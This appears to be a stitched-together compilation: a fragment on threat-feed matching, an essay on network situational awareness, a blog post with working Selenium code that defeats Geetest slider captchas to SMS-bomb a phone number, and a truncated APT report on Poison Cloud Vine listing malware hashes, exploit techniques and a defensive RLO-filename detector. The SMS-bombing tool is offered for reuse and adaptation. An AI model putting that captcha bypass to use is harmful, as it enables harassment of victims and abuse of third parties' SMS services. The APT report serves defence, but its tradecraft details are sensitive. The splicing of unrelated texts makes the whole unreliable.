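Two details matter in practice and are built in: domains are matched against every parent domain, so sub.cdn.bad.example hits cdn.bad.example, and hashes, sender addresses and DNS names are normalised (case, trailing dot) before comparison, because feeds and logs rarely agree on format.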


What is situational awareness? Prevention, early warning, prediction

What is situational awareness?

What exactly does situational awareness study? The first step, naturally, is to look it up on Baidu. Baidu Baike offers only one sentence: "in a large-scale system environment, acquiring, understanding and displaying the security elements that can change the state of the system, and predicting its future trend." Below I summarise, from my own searching, what situational awareness means in the network security sense.

Network situation means the current state and trend of change of the whole network, as formed by factors such as the running state of the various network devices, network behaviour and user behaviour. Network situational awareness means acquiring, understanding and displaying the security elements that can change the network situation in a large-scale network environment, and predicting the near-term trend.

"Situation" is not "event"

"Xiao Li, while you were at work, your neighbour Lao Wang went into your flat." That is an event.

"Xiao Li, I think the way your neighbour Lao Wang looks at your wife is not quite right; keep an eye on it." That is a situation.

So an event is a deterministic outcome; even a predicted event should be a guess with high accuracy, more like a definite number worked out from a formula. A situation is a trend, and once "awareness" is added it becomes a prediction of that trend.

"Situation" versus "intelligence"

Intelligence is a prediction with a high degree of certainty, based on public or non-public information.

Network security situational awareness has three levels: the first is being able to perceive that an attack exists; the second is being able to identify the attacker or the attack's intent; the highest is risk assessment: analysing the attacker's behaviour to evaluate what harm it, including its expected follow-on actions, does to the network system, and so providing an important basis for decisions.

With more and more devices connected to the internet the volume of data is enormous, and the value hidden in big data is boundless. We can use big data for business analysis; attackers can use it for destruction. Situational awareness, in my view, is the combination of big data and security defence.

Big-data-based whole-network situational awareness is a direction for the future of information security. The threats and challenges facing information security have risen to a higher level; cyber war is no longer a legend, which poses a great challenge to defence: under large-scale APT attacks no single enterprise or individual can withstand attacks of that size, so defence must be whole-network, coordinated, joint defence.

Big-data situational awareness monitors the whole network in real time through monitoring nodes deployed across the country, gives early warning of possible attacks, and protects users' network security at scale. Defence at scale is achieved in three ways: first, a cloud defence network whose nodes, deployed nationwide, provide user systems with anti-DDoS, application-layer protection and early warning of major security events; second, traffic scrubbing, providing scrubbing equipment for manageable defence and monitoring of user systems; third, honeypot monitoring, which builds honeypots to trap the many attacks and intrusions, collects new samples, reduces risk and gathers the latest situational information.

Situational awareness: what is it?

The concept of situational awareness originated with the US Air Force, as research into improving air-combat capability: analysing air-combat environment information and rapidly judging the current and future situation in order to respond correctly.

In the 1990s the concept was introduced into information security. The best-known application is the US EINSTEIN programme (formally the National Cybersecurity Protection System), begun in 2003 and in its third phase by 2013; US-CERT and later DHS (the Department of Homeland Security) have explored situational awareness continuously.

The US Committee on National Security Systems defines it as "within a volume of time and space, the perception of an enterprise's security posture and its threat environment; the comprehension of both together and the risk they imply; and the projection of their status into the near future." Situational awareness emphasises building detection and response-analysis capability, which is indeed the most pressing real-world security need.

Why is situational awareness needed?

Faced with a new security landscape, traditional security systems have hit a bottleneck: security operations need to be raised to a higher level while active defence capability is built out.

The continuous US investment in EINSTEIN shows how important cyberspace situational awareness is to a nation or an industry. China's network security situation is very serious: by the end of 2016, 360 alone had cumulatively observed 36 APT groups attacking targets inside China, at least 13 of them still active, with targets spanning government bodies, universities, research institutes and the industries and enterprises of critical infrastructure. This year's WannaCry ransomware worm showed the enormous damage cyber weapons can do once they leak into civilian use.

Looking at real-world security construction, for years we have focused on architectural security (vulnerability management, system hardening, security-domain segmentation and so on) and passive defence capability (IPS, WAF, AV and so on). That has achieved results, but has also hit a development bottleneck: simply buying more security appliances no longer raises security capability. Security operations need to be lifted to a higher level while active defence capability is built: on top of the automated defences already in place, invest in non-signature detection and in incident response and analysis capability, and through deep analysis of incidents and sharing of information and intelligence, establish prediction and early warning and improve the security system accordingly, so that new attack threats can be detected and defended against effectively.

It is because of these real problems that General Secretary Xi's speech of 19 April 2016 explicitly called for building "all-weather, all-round awareness of the network security situation".

What can situational awareness do?

Network security, like war, is in essence a contest between attacker and defender, and in that contest speed is king: the defender's goal is to shorten the time in which the attacker can act freely. The role of a situational awareness system is to analyse security-environment information and quickly judge the current and future situation so that the right response can be made.

"All-weather, all-round awareness of the network security situation" describes the construction goal precisely. "All-weather" and "all-round" can be read as the time dimension and the detection-content dimension.

On the time dimension, existing real-time or near-real-time detection must be used, and longer-term data must also be analysed to find anomalous behaviour, especially signs of compromise.

On the content dimension, coverage is needed across network traffic, endpoint behaviour and content payloads. The five (or at least four) detection capabilities below should be provided in full (after Gartner's "Five Styles of Advanced Threat Defense"):

  • real-time detection on traffic signatures (WAF, IPS, NGFW and so on)
  • anomaly analysis on traffic logs (traffic sensors, hunting, UEBA)
  • static and dynamic analysis of content (sandboxes)
  • real-time detection on endpoint behaviour signatures (ESP)
  • anomaly analysis on endpoint behaviour logs (EDR, hunting, UEBA)

"Situation" (态) is the current state seen from a global viewpoint, covering the organisation's own threat state and the overall security environment. It requires the five detection capabilities above to find as many attack events and clues as possible, and requires further analysis of the resulting alerts to answer:

  • Is it a real attack? Could it be a false positive? Has a scan been mistaken for a real attack?
  • What kind of attack is it: targeted or opportunistic?
  • What is the likely scope of impact and the harm?
  • What are the mitigation or eradication methods, and how hard are they?

Without correct answers to these questions, simply plotting alerts on a map does not produce a "situation" of any real value, and it is impossible to decide whether to enter the handling process.

"Trend" (势) is the future state. Predicting the organisation's future security state requires deep understanding of the attack events currently faced, especially targeted attacks:

  • Is it a new attack group or a known one?
  • What is the attacker's intent?
  • What is the attacker's tactical and technical level, and what are its characteristics?
  • Is it part of a larger campaign?

Knowing these things, and through information and intelligence sharing also knowing about comparable cases in the same industry or similar departments, makes it possible to predict the likely future security state and the defensive priorities: the capability of prediction and prevention.

Who can do situational awareness?

Meeting the construction goals requires three core elements: traffic data collection, threat intelligence and security analysts.

Traffic data collection is relatively easy to implement and has irreplaceable value: traffic logs support security hunting and anomaly detection, analysis of an attack's scope, and reconstruction of the full attack chain and TTPs (tactics, techniques and procedures). Traffic data is therefore a necessary part of situational awareness.

Threat intelligence is a field that has grown rapidly alongside defence against new threats, and it plays a decisive role in building situational awareness. The type most often mentioned is machine-readable threat intelligence (MRTI), which is mainly fed to security products to strengthen or upgrade their capability.

To help security analysts analyse incidents, the threat intelligence field provides dedicated analysis tools (intelligence analysis platforms / correlation analysis platforms). With such a platform an analyst can easily do work that used to cost enormous physical and mental effort and was still hard to complete:

  • determine whether an attack belongs to a known attack
  • find the network infrastructure (domains, hosts) and samples related to the attack
  • learn the details of that infrastructure and those samples
  • determine whether the attack is linked to a known group, and learn that group's background

Threat intelligence also includes TTP-type intelligence, which is human-readable: it targets important incidents that have already happened, analyses the attacker's scope, objectives, specific tactics and techniques and attack process, and distils defensive recommendations.

Traffic data and threat intelligence are both very important, but how much they deliver ultimately depends on people, above all the security analyst, the senior talent of security operations. Analysts need a good environment (data and intelligence) and plenty of hands-on opportunities to develop, and are hard to train in large numbers. Analysts are a part of situational awareness that must be taken seriously and another key factor in whether a project succeeds; a successful project must consider how to recruit or train them and give them good tools and processes so that they can work efficiently.

Situational awareness is a comprehensive security capability build. Traffic data, threat intelligence and security analysts are the key success factors; beyond those, big-data platforms, visualisation and asset management also matter.

How to build situational awareness?

Building situational awareness is a complex systems-engineering effort; building it in phases is a necessary and prudent approach.

Taking the main aspects of situational awareness together, the following phases are suggested:

1. Complete basic internal situational awareness for a given organisation

This phase covers collection of data and alerts, a threat intelligence platform, an incident analysis and assessment platform, an internal handling-management platform, and the visualisation applications that present and assist this work. With these, a single organisation can support complete security operations. The security analysts needed can be obtained by buying external services.

2. Establish a vertical support system and an intelligence-sharing system

This phase adds a vertical malware analysis centre, a strengthened incident analysis centre, an intelligence-sharing mechanism and a vertical threat intelligence centre. Malware analysis and major-incident analysis need high-level analysts; concentrating those resources in a vertical structure raises the overall operating level faster and helps develop analysts. The sharing mechanism keeps information synchronised within the industry and with public security and cyberspace administration bodies, while the vertical intelligence centre collects, processes and distributes internal intelligence, giving a more precise and complete grasp of the threats facing the whole industry or organisation so that key intelligence is used faster and more effectively.

3. Establish overall automated defence capability

At this stage, as the vertical support system and overall intelligence-analysis capability grow, key incidents can be defended against as a whole: for example automatically configuring the relevant NGFW, IPS or mail gateways, or using the internal DNS to redirect particular DNS resolutions (sinkholing). These means contain attacks faster and more efficiently and buy time for eradication.

Before building a security system, especially one as complex as situational awareness, it is advisable to consult and plan with professional consultancies and security service providers as preparatory work.

Which partners to choose?

Building situational awareness requires clear goals, control of the key factors and phased construction, and choosing the right partner in that process is especially important.

Which partner can provide the most important threat intelligence and analyst resources and a mature traffic-data solution deserves careful consideration. Encouragingly, the data platforms, threat-intelligence capability and senior analyst resources that once constrained situational awareness have all developed rapidly in recent years, and good-quality resources are now available. After a period of building situational awareness, China's cyberspace security should improve across the board, with enough capability to face threats from cybercrime groups, ideological hackers and nation-state attackers.


Cracking the Geetest slider captcha for SMS bombing: simulating the user's slide to unlock

Code first:

#! python3
# coding:utf-8

import time,random
from PIL import Image
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
import logging

logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s -%(message)s')

phoneNum = '13456788765'
# initial offset
initial_offset = 10
URLs = ['https://biaodan.info/q/7sisis']

#TODO get html elements
def sendPhone(driver, phoneNum, phoneInputClass, sendPhoneButtonId):
  # driver = webdriver.Chrome()
  logging.debug('Send Phone Start')
  phoneInput = driver.find_element_by_class_name(phoneInputClass)
  phoneInput.send_keys(phoneNum)
  time.sleep(2)
  sendBtn = driver.find_element_by_id(sendPhoneButtonId)
  sendBtn.click()
  time.sleep(5)

#TODO compare Captcha & return track
def elementsScreenshot(driver, bgImgClass, dragBallClass):
  # driver = webdriver.Chrome()
  logging.debug('start make background screenshot')
  driver.find_element_by_class_name(bgImgClass).screenshot('bg_full.png')
  time.sleep(2)
  ball = driver.find_element_by_class_name(dragBallClass)
  ActionChains(driver).click_and_hold(ball).perform()
  ActionChains(driver).move_by_offset(190, 0).perform()
  # move the ball to right
  # this is important
  time.sleep(0.5)
  driver.find_element_by_class_name(bgImgClass).screenshot('cut.png')
  # move the ball to left
  ActionChains(driver).move_by_offset(-30, 0).perform()
  time.sleep(1)
  ActionChains(driver).move_by_offset(-50, 0).perform()
  time.sleep(1)
  ActionChains(driver).move_by_offset(-40, 0).perform()
  time.sleep(1)
  ActionChains(driver).move_by_offset(-30, 0).perform()
  time.sleep(1)
  ActionChains(driver).move_by_offset(-40, 0).perform()

def dragBall(driver, track, dragBallClass):
  ball = driver.find_element_by_class_name(dragBallClass)
  logging.debug('ball start move')
  # simulate human behaviour: play the track steps back in random order
  # (`step` replaces the original name `len`, which shadowed the builtin)
  while track:
    step = random.choice(track)
    ActionChains(driver).move_by_offset(step, 0).perform()
    track.remove(step)
    logging.debug(track)
    time.sleep(max(step, 0) / 10)   # a negative step would make sleep() raise
  imitate2L = ActionChains(driver).move_by_offset(-2, 0)
  imitateL = ActionChains(driver).move_by_offset(-1, 0)
  time.sleep(0.015)
  imitate2L.perform()
  time.sleep(0.04)
  imitateL.perform()
  time.sleep(0.04)
  imitate2L.perform()
  time.sleep(0.04)
  imitateL.perform()
  time.sleep(0.04)
  imitate2L.perform()
  ActionChains(driver).pause(random.randint(6, 10) / 10).release(ball).perform()

def getTrack(distance):
  logging.debug('calculate distance track')
  # simulate human behaviour with s = v0*t + 1/2*a*t^2: accelerate for the
  # first three quarters of the distance, then decelerate
  track = []
  current = 0
  mid = distance * 3 / 4
  t = random.randint(2, 3) / 10
  v = 0
  logging.debug('1')
  while current < distance:
    if current < mid:
      a = 2
    else:
      a = -3
    v0 = v
    v = v0 + a * t
    move = v0 * t + 1 / 2 * a * t * t
    current += move
    track.append(round(move))
    logging.debug(track)
  return track

# TODO compare two img
def compareImg(img1, img2, x, y):
  logging.debug('compare img start')
  pix1 = img1.load()[x, y]
  pix2 = img2.load()[x, y]
  threshold = 60
  # The original wrote abs(pix1[i] - pix2[i] < threshold), which applies abs()
  # to the boolean instead of the difference, so a pixel that became brighter
  # in the second image (negative difference) was never detected as changed.
  # Compare the absolute difference of each RGB channel.
  return all(abs(pix1[i] - pix2[i]) < threshold for i in range(3))

def getOffset(bgFullPath, bgPath):
  logging.debug('get img offset')
  bg_full = Image.open(bgFullPath)
  bg = Image.open(bgPath)
  left = initial_offset
  for width in range(left, bg_full.size[0]):
    for height in range(bg_full.size[1]):
      if not compareImg(bg_full, bg, width, height):
        left = width
        return left
  return left
#TODO execute Crack it

def main(driver):
  logging.debug('main() start')
  for url in URLs:
    driver.get(url)
    logging.debug('%s get html', url)
    time.sleep(3)
    sendPhone(driver, phoneNum, 'filter-input', 'btnSendCode')
    elementsScreenshot(driver, 'gt_cut_fullbg', 'gt_slider_knob')
    distance = getOffset('bg_full.png', 'cut.png')
    # logging.debug('%s',distance)
    track = getTrack(distance)
    dragBall(driver, track, 'gt_slider_knob')
    time.sleep(3)

if __name__ == '__main__':
  driver = webdriver.Chrome()
  for i in range(1, 2):
    logging.debug('%s Test', i)
    try:
      main(driver)
    except Exception as exc:
      # the original printed "%d Error" without formatting it; log the cause
      logging.exception('%d Error: %s', i, exc)
  driver.close()
  driver.quit()

In some penetration-testing scenarios an SMS bombing operation against a phone number is needed. Not wanting to spend money on it, I noticed that some sites built on 衚单倧垈 (biaodan.info) provide an SMS verification-code service, but each send requires passing a captcha; hence this write-up.
A homepage found through a search engine (no malicious intent):

Enter an arbitrary number and click send, and the captcha appears:

To mass-send across sites you need the following:
1. A certain number of sites offering the verification-code service. Each page has a rate limit allowing a resend only after 120 s, but in practice you do not need to wait the full 120 s; spacing the sends out does raise the success rate.
2. Browser automation with Selenium and WebDriver.
3. The code itself. There are other implementations on GitHub, but they performed poorly on 衚单倧垈, hence the implementation here.

Implementation:
First import the libraries and declare the variables (top of the listing above).

Find the phone-number input box and simulate typing the number (sendPhone() above).

The captcha image element is captured by region screenshot, which is fast, convenient and accurate; Geetest's image cannot be obtained by inspecting the element for a download URL, because it is stitched together piece by piece (elementsScreenshot() above).

Next, get the element to operate on: the slider knob that is dragged (dragBall() above).

After that comes computing the track for the captcha slide. The destination is found by comparing the two screenshots for differences; that is why, when taking the screenshots, the slider was first moved to the far right, so that the first difference found is the endpoint of the move. The track algorithm follows an implementation found online; in short, s = v0·t + ½at² (getOffset() and getTrack() above).

That is essentially it; what remains is the main program (main() above).

The same approach can be used against other sites that use Geetest; adapt it yourselves.
The code is on GitHub; forks and stars welcome:
https://github.com/xtom598/geeTestCode

from

The post 极验验证码砎解 实现短信蜰炞 暡拟甚户滑劚解锁 appeared first on 🔰雚苁ℒ🔰.


Poison Cloud Vine (毒云藀, APT-C-01): Exposing a Military and Political Intelligence Spy


Poison Cloud Vine report, PDF version download link: 毒云藀

Chapter 1  Overview

1.    Key findings

Since 2007, the 360 Helios Team has observed the Poison Cloud Vine group conducting cyber-espionage for 11 years against key Chinese units and departments in national defense, government, science and technology, education and maritime affairs. The group focuses on the defense industry, Sino-US relations, cross-strait relations and maritime fields; its areas of interest overlap to some extent with those of the OceanLotus (海莲花) APT group we reported on earlier.

The first Poison Cloud Vine trojan captured by the 360 Helios Team appeared in December 2007. In the 11 years since, we have captured 13 versions of its malicious code, 73 samples in total. In the initial-compromise phase the group relies mainly on spear-phishing emails. Before an attack it researches and carefully selects its targets, and builds decoy documents and emails whose content is closely tied to the target's industry or field, mainly conference materials, research results, notices and announcements specific to that field. Over this period there were 10 exploit-document samples, including one 0day. Victims of these trojans are spread across 31 provincial-level regions of China. There are 59 C&C domains, resolving to addresses in 4 different countries or regions.

The following dates in Poison Cloud Vine's 11 years of espionage against China are worth noting:

  • December 2007: first trojan related to the group discovered; maritime-related, apparently targeting a large shipping company
  • March 2008: a key laboratory at a domestic university (a research institution)
  • February 2009: attacks on the defense industry begin (a well-known defense-industry journal)
  • October 2009: the trojan adds a special anti-static-scanning technique (reversed API strings), carried into most later versions and still in use in 2018
  • December 2011: the trojan adds a special anti-dynamic-detection technique (wrong API parameters), carried into most later versions and used until 2015
  • February 2012: first sighting of modified backdoor 1 based on the zxshell code; its key function is stealing documents such as .doc, .ppt, .xls and .wps
  • March 2013: concentrated attacks on the Chinese Academy of Sciences and several state ministries and bureaus in science and technology, maritime affairs and other fields
  • October 2013: watering-hole attack on a Chinese government website
  • May 2014: evolved version 2 of the modified zxshell backdoor; on top of version 1 it adds searches for keywords such as "军" (military), "航" (aviation/navigation) and "报告" (report)
  • 12 September 2014: first sighting of events and samples related to the CVE-2014-4114 0day
  • 14 October 2014: iSIGHT publishes its report identifying the CVE-2014-4114 0day; Microsoft issues its security bulletin the same day
  • 25 February 2015: attacks on a defense-industry association (defense science and technology), the Chinese Academy of Engineering and others; the Kanbox (酷盘) version sample is found at the same time
  • October 2017: spear-phishing, mainly with CVE-2017-8759 exploit documents, against the website of a large media organization and personnel of a Quanzhou government agency
  • April 2018: 360 Threat Intelligence Center publicly discloses the group's malicious code that uses CVE-2017-8759 exploit documents
  • May 2018: attacks on several shipbuilding companies, port operators and other maritime organizations

Note:

The first-attack dates above are statistics based on the data we currently hold on the group; they do not mean we have captured all of the group's attacks and activity.

    2.    Origin of the name

Since 2015, domestic APT research has gradually started up and accelerated. Following the exposure of groups such as "OceanLotus" and "Blue Mushroom" (蓝宝菇), Poison Cloud Vine (APT-C-01) is another APT group that persistently attacks sensitive information in the government, defense-industry and maritime fields.

The group was discovered independently by 360, which was the first to disclose some related information (see https://ti.360.net/blog/articles/analysis-of-apt-c-01/, published April 2018); this meets 360's criteria for independently naming an APT group.

360 Threat Intelligence Center named APT-C-01 "Poison Cloud Vine" (毒云藀) mainly for two reasons: first, the group used the Poison Ivy trojan in many of its attacks; second, when relaying information it used cloud drives as a stepping stone to transfer material, which resembles a climbing vine going up and over a wall. Following 360 Threat Intelligence Center's naming rules for APT groups (see the 2016 China Advanced Persistent Threat Research Report), and taking into account the vine plants common in the region the group is associated with, APT-C-01 was named "Poison Cloud Vine".

In addition, Antiy Labs published an analysis report on the APT group "GreenSpot" (绿斑) on 19 September 2018. Under the mutual-recognition agreement between 360 Threat Intelligence Center and Antiy Labs, 360's "Poison Cloud Vine" (APT-C-01) corresponds to Antiy's "GreenSpot": they are the same group. We therefore also publish what we have observed and the group's attack characteristics, in a joint effort to improve China's APT defenses.

Chapter 2  Attack goals and victim analysis

1.     Attack goals

The group's main goal is to steal data from Chinese government and research-related sectors. The data is mainly documents; the keywords and file extensions of interest are:

Keywords:
“201”, “2014”, “2015幎”, “报”, “报告”, “兵”, “郚队”, “对台”, “工䜜”, “规划”, “囜”, “囜际”, “航”, “合䜜”, “机”, “机场”, “基地”, “极地”, “军”, “军事”, “科技”, “密”, “内郚”, “十”, “十䞉”, “台”, “台湟”, “铁路”, “无人”, “项”, “雪”, “研”, “运蟓”, “战”, “站”, “䞭”
Extensions:
“doc”, “ppt”, “xls”, “pdf”, “rtf”, “rar”, “wps”, “doc*”, “ppt*”, “xls*”

Stealing victim host information:

Figure 1: Example screenshots of stolen host information

Figure 2: Monthly infected users (July 2014 – June 2015)

2.      Sector distribution

Mainly national defense, government, science and technology, education, etc.

Related fields include the oceans (South China Sea, East China Sea, surveying and mapping), the defense industry, Taiwan issues (cross-strait relations) and Sino-US relations.

3.      Geographic distribution

Figure 3: Distribution of infected regions in China (July 2014 – June 2015)

Figure 4: Proportion of infected regions in China

Region	Count
Beijing	296
Fujian	55
Guangdong	43
Zhejiang	39
Shanghai	32

Chapter 3  11 years of activity

1.      Initial compromise

1)     Spear-phishing emails

Spear-phishing is a common APT technique, used mainly in the initial-compromise phase. Put simply, email is the attack vector: both the body and the attachments may carry malicious code, most often an exploit document as the attachment; roughly 90% of attacks are of this kind [1].

This section covers two methods: emails carrying exploit documents and emails carrying binary executables.

A.       Exploit documents

Type	MD5	File name	Malware name
Email attachment	a5d9edaa1b6cf820d54c19b2c6bd246d	䞓䞚技术干郚手册.rar (Professional Technical Cadre Handbook)	
PE inside archive	2fa75fdf4d57c182bc6c0438dd6cbf27	HandBook.chm	
Dropped PE	b04d7fa1c7e3a8274ba81f48f06a5f4e	hh.exe	Backdoor.Win32.FakeWinupdate

Figure 5: Exploit document case 1, email screenshot

Figure 6: Exploit document case 1, email attachment archive screenshot

Figure 7: Exploit document case 1, decoy CHM document screenshot

Type	MD5	File name	Malware name
Email attachment	19365fddc2fca8735d51def001704db3	2013䞭囜亚掲倪平掋孊䌚幎䌚文件.doc (2013 China Asia-Pacific Society annual meeting document)	virus.exp.20120158
Dropped PE	07561810d818905851ce6ab2c1152871	update.exe	Backdoor.Win32.ZxShell

Figure 8: Exploit document case 1, email screenshot

Type	MD5	File name	Malware name
Email attachment	9fb6866c2cdd49387a520f421a04b882	䞭科院2013幎研究项目材料.doc (Chinese Academy of Sciences 2013 research project materials)	virus.exp.20120158
Dropped PE	f3ed0632cadd2d6beffb9d33db4188ed	update.exe	Backdoor.Win32.PoisonIvy

Figure 9: Exploit document case 2, email screenshot

Figure 10: Exploit document case 2, decoy document dropped by the exploit document

B.       PE binary executables

Type	MD5	File name	Malware name
Email attachment	954f50f7ed8b4c11b59560769de0ec36	关于掚荐第十䞉届䞭囜青幎科技奖候选人的通知.rar (Notice on recommending candidates for the 13th China Youth Science and Technology Award)	Dropper.Win32.FakeDoc
PE inside archive	8c9670fbe68ab8719077d480242e6b9e	关于掚荐第十䞉届䞭囜青幎科技奖候选人的通知.exe	Dropper.Win32.FakeDoc
Dropped PE	6a37ce66d3003ebf04d249ab049acb22	svchoct.exe	Backdoor.Win32.HttpBot

Figure 11: PE executable case, email screenshot

Figure 12: PE executable case, email attachment archive screenshot

Figure 13: PE executable case, decoy document dropped by the trojan, after opening

When sending phishing emails the group usually logs into web mail or uses a tool such as PHPMailer [2].

C.       Self-extracting archives

The group sends RAR self-extracting (SFX) programs, in compressed form, to the target mailboxes.

The attachment contains the trojan file:

The file is actually a RAR SFX program with the parameters shown below; double-clicking the exe directly runs the bat file inside:

The default batch command moves the trojan body to the temp directory, runs it, and deletes the batch file:

2)     RLO [3] disguised document extension

Type	MD5	File name	Malware name
Email attachment	954f50f7ed8b4c11b59560769de0ec36	䞜海航保通信台站规划补充材料hangbaoexe.doc as displayed (real extension: cod.exe)	Dropper.Win32.FakeDoc

Figure 14: RLO disguised-extension sample screenshot
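The RLO trick above can be caught at the mail gateway by rendering a file name the way a file manager would and comparing the displayed extension with the one the OS actually uses. This is an added example, not code from the report; the sample file names are constructed to follow the same pattern (a U+202E character in front of "cod.exe" so that the name displays as "...exe.doc").

```python
"""Detect right-to-left-override (RLO) file-name spoofing in email attachments."""

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
EXECUTABLE_EXTS = {"exe", "scr", "com", "bat", "cmd", "pif", "hta", "js", "vbs"}


def displayed_name(name: str) -> str:
    """Approximate what a file manager shows: text after an RLO is rendered reversed."""
    if RLO not in name:
        return name
    head, _, tail = name.partition(RLO)
    # Drop any further bidi controls from the tail before reversing it.
    tail = "".join(ch for ch in tail if ch not in BIDI_CONTROLS)
    return head + tail[::-1]


def real_extension(name: str) -> str:
    """Extension the operating system uses: text after the last dot, controls removed."""
    clean = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    return clean.rsplit(".", 1)[-1].lower() if "." in clean else ""


def displayed_extension(name: str) -> str:
    """Extension a user believes they see."""
    shown = displayed_name(name)
    return shown.rsplit(".", 1)[-1].lower() if "." in shown else ""


def check_attachment(name: str) -> dict:
    """Triage verdict for one attachment name: suspicious when a bidi control hides an executable."""
    has_bidi = any(ch in BIDI_CONTROLS for ch in name)
    real = real_extension(name)
    shown = displayed_extension(name)
    suspicious = has_bidi and real in EXECUTABLE_EXTS and shown != real
    return {
        "name": name,
        "displayed": displayed_name(name),
        "real_ext": real,
        "displayed_ext": shown,
        "has_bidi_control": has_bidi,
        "suspicious": suspicious,
    }


# Constructed sample names (not the report's real attachment names).
SAMPLES = [
    "hangbao" + RLO + "cod.exe",   # shown as "hangbaoexe.doc", really an .exe
    "report_2014.doc",             # ordinary document
    "notice" + RLO + "txt.scr",    # shown as "noticercs.txt", really a screensaver
]

if __name__ == "__main__":
    for n in SAMPLES:
        v = check_attachment(n)
        print(v["displayed"], "->", v["real_ext"], "suspicious" if v["suspicious"] else "ok")
```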

3)     Disguised icon, hidden extension

Type	MD5	File name	Malware name
Email attachment	cbeebf063f914eb3b5eba8b37302189f	“军民融合深床发展战略研究”咚询项目正匏启劚 .exe ("Research on the in-depth development strategy of military-civil fusion" consulting project officially launched .exe)	Dropper.Win32.FakeFolder

Figure 15: Disguised icon / hidden extension, case 1 screenshot

Type	MD5	File name	Malware name
Email attachment	ae004a5d4f1829594d830956c55d6ae4	2014-03-18䞭囜系统仿真孊䌚科研项目经莹自查xls             _____________________________.exe (2014-03-18 China Simulation Federation research project funding self-inspection, padded with spaces and underscores to hide the .exe)	Dropper.Win32.FakeXls

Figure 16: Disguised icon / hidden extension, case 2 screenshot

Figure 17: Disguised icon / hidden extension, case 2, decoy document dropped by the trojan

2.      Exploit analysis

1)     CVE-2012-0158

CVE ID	CVE-2012-0158
Description	A remote code execution vulnerability exists in the Windows common controls. An attacker could exploit it by constructing a specially crafted web page; when a user views the page, the vulnerability could allow remote code execution. An attacker who successfully exploits it could gain the same user rights as the logged-on user.
Published	10 April 2012
References	https://technet.microsoft.com/zh-cn/library/security/ms12-027.aspx  http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158

A.       Exploit document execution flow

Figure 18: CVE-2012-0158 exploit document execution flow

B.       MHT format

Figure 19: Two forms of the exploit document, MHT (top) versus RTF (bottom)

CVE-2012-0158 exploits are mostly RTF and DOC files, but in this campaign the DOC files were all saved in MHT format, so the antivirus engine's pre-check logic did not match and the exploit check was skipped. At the time, these exploit documents had low detection rates.

C.       Shellcode comparison

Item	Common characteristics
Shellcode	The first-stage shellcode XORs with 0xA3 to decrypt; all samples use 3 stages of shellcode with identical data structures
Magic values	0x22776655, 0xCACACACA, 0xA02005CA, identical in all samples
Dropped files	Same paths. Decoy document under “%USERPROFILE%” (the file name varies, e.g. “关于对䞭船钊州倧型海工修造及保障基地项目䞀期工皋建讟工䜜莣任衚的意见37号.doc”, “䞀䌚重芁发垃报告.doc”, “123.doc”). PE trojan at “C:\Documents and  Settings\All Users\「匀始」菜单\皋序\启劚\update.exe”
Trace cleaning	Decodes the registry keys below and deletes them, to remove Office's records of failed opens and similar history:
	”Software\Microsoft\Office\12.0\Word\Resiliency\DisabledItems”, "Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems”, "Software\Microsoft\Office\11.0\Word\Resiliency\DocumentRecovery”, "Software\Microsoft\Office\11.0\Word\Resiliency\DisabledItems”, "Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems”

Comparing the shellcode across the exploit documents shows essentially identical structure and functionality, from which we further infer that the exploit documents were developed by the same group.

2)     CVE-2014-6352 (0day)

A.       Background

CVE-2014-4114 was reported by iSIGHT [4] on 14 October 2014; the report described a 0day, CVE-2014-4114, used in Russia-related cyber-espionage aimed mainly at NATO, the EU, telecommunications and energy. Microsoft also published its security bulletin on 14 October.

CVE-2014-6352 can be regarded as a bypass of the CVE-2014-4114 patch. Microsoft's original fix added a MakeFileUnsafe call after the INF and EXE files are generated, setting the files' Zone information so that a security prompt appears when the exploit later installs the INF. The CVE-2014-6352 samples abandoned using an INF to install the exe and instead execute the exe directly. On XP and later, the second entry of an executable's context menu is "run as administrator", so if the user has turned off UAC there is no security prompt at all. Microsoft's 6352 patch therefore adds a security prompt when the context menu is invoked.

CVE ID	CVE-2014-4114
Description	A vulnerability exists in Windows OLE that could allow remote code execution if a user opens a file containing a specially crafted OLE object. An attacker who successfully exploits it could gain the same user rights as the logged-on user. If the current user is logged on with administrative rights, the attacker could then install programs; view, change or delete data; or create new accounts with full user rights. Users whose accounts are configured with fewer rights could be less affected than those with administrative rights.
Published	14 October 2014
References	https://technet.microsoft.com/zh-cn/library/security/ms14-060.aspx  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4114

CVE ID	CVE-2014-6352
Description	A remote code execution vulnerability in the context of the current user is triggered when a user downloads or receives, and then opens, a specially crafted Microsoft Office file containing an OLE object. Microsoft initially learned of the vulnerability through coordinated vulnerability disclosure; it was first described in Microsoft Security Advisory 3010060. Microsoft is aware of limited attacks attempting to use it. The update addresses the vulnerabilities by modifying how the affected operating systems validate memory use when accessing OLE objects.
Published	21 October 2014
References	https://technet.microsoft.com/zh-cn/library/security/3010060.aspx  https://technet.microsoft.com/zh-cn/library/security/ms14-064.aspx  http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6352

B.       In this campaign

MD5	File name	Malware name
da807804fa5f53f7cbcaac82b901689c	指挥控制䞓委䌚评审莣任乊.ppsx (Command and Control Special Committee review responsibility statement)	virus.exp.20146352
19f967e27e21802fe92bc9705ae0a770	南海诟题项目建议乊.ppsx (South China Sea topic project proposal)	virus.exp.20146352

Figure 20: CVE-2014-6352 exploit document property information

Figure 21: Key dates for CVE-2014-6352

The samples in this campaign did not use an INF [5] as a stepping stone but run the exe directly. After CVE-2014-4114 triggers, the second context-menu entry is invoked by default (on Windows 7 this is normally "run as administrator"); if the second entry is something else, the malware path is passed to it as a parameter, which causes some compatibility problems. The execution effect is shown below:

Figure 22: Exploit execution effect

Exploit document version upgrades

Figure 23: Sandworm exploit document sample, version A

Figure 24: Sandworm exploit document sample, version B

Figure 25: Poison Cloud Vine exploit document sample, version C

Version	Date	Vendor	Description
Version A	14 October 2014 (report publication)	iSIGHT	Downloads the PE trojan from a UNC path and installs and launches it via an INF
